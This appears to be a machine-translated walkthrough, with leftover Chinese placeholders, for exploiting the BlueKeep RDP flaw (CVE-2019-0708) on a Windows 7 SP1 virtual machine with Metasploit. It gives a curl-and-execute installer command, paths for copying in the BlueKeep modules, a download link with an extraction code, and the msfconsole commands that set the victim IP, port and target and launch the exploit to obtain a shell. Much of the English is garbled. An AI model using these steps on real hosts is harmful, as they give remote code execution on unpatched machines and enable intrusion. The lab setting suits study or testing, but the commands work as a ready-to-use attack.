Environmental Vulnerability
Using VMware to install Windows7 SP1 victim machine simulation
Use
Attack tools ready
- 1. Use the following command to update a key frame mounted metasploit
-
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && chmod 755 msfinstall && ./msfinstall
- 2. Download the file reference in the document to be placed MSF attack kit folder (if the file already exists, can be directly covered)
-
rdp.rb - > /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cve_2019_0708_bluekeep.rb - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb cve_2019_0708_bluekeep_rce.rb - > /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
Attack command
Use msfconsole
show into the Metasploit framework of
After entering the show using the reload_all
reload module uses 0708rdp
Use use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
enable 0708RDP module attacks
Use info
viewing tools and information set
It is seen as key to set the primary RHOSTS
\ RPORT
\target
Use
set RHOSTS 受害机IP
to set the victim machine IP
Use set RPORT 受害机PORT
to set the victim machine RDP port number
Use set target ID数字(可选为0-4)
to set the victim machine machine architecture
Here we are using is VMware, then the target 2 satisfy the condition
Use exploit
began to attack, waiting to establish a connection after the connection is established, using the obtained shell, then use to get an interactive shell then complete the attack, successfully got permission to host victims
reference
Link: https: //pan.baidu.com/s/1v3B8Vvi26W7LWjO3IcsNZg extraction code: ml9g